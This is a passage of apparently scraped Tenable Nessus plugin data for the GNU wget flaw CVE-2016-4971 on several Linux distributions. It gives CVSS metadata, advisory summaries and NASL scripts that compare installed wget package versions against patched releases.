value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"wget-1.16-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"wget-debuginfo-1.16-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"wget-debugsource-1.16-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:22:32", "description": "Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T00:00:00", "type": "nessus", "title": "Fedora 23 : wget (2016-2db8cbc2fd)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-2DB8CBC2FD.NASL", "href": "https://www.tenable.com/plugins/nessus/92074", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2db8cbc2fd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92074);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"FEDORA\", value:\"2016-2db8cbc2fd\");\n\n script_name(english:\"Fedora 23 : wget (2016-2db8cbc2fd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security 
update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2db8cbc2fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"wget-1.18-1.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:22:45", "description": "Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T00:00:00", "type": "nessus", "title": "Fedora 24 : wget (2016-e14374472f)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-E14374472F.NASL", "href": "https://www.tenable.com/plugins/nessus/92186", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-e14374472f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92186);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"FEDORA\", value:\"2016-e14374472f\");\n\n script_name(english:\"Fedora 24 : wget (2016-e14374472f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"Updated to 1.18 due to CVE-2016-4971\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-e14374472f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"wget-1.18-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-17T14:22:21", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.\n(CVE-2016-4971)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-15T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : wget (ALAS-2016-720)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:wget", "p-cpe:/a:amazon:linux:wget-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-720.NASL", "href": "https://www.tenable.com/plugins/nessus/92222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-720.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92222);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"ALAS\", value:\"2016-720\");\n\n script_name(english:\"Amazon Linux AMI : wget (ALAS-2016-720)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GNU wget before 1.18 allows remote servers to write to arbitrary files\nby redirecting a request from HTTP to a crafted FTP resource.\n(CVE-2016-4971)\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-720.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update wget' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"wget-1.18-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"wget-debuginfo-1.18-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T17:02:32", "description": "From Red Hat Security Advisory 2016:2587 :\n\nAn update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-11T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : wget (ELSA-2016-2587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:wget", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/94708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2587 and \n# Oracle Linux Security Advisory ELSA-2016-2587 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94708);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"Oracle 
Linux 7 : wget (ELSA-2016-2587)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2587 :\n\nAn update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. 
(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-November/006485.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T17:02:34", "description": "An update for wget is now available for Red Hat Enterprise Linux 
7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-28T00:00:00", "type": "nessus", "title": "CentOS 7 : wget (CESA-2016:2587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:wget", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/95333", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2587 and \n# CentOS Errata and Security Advisory 2016:2587 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95333);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n 
script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"CentOS 7 : wget (CESA-2016:2587)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP 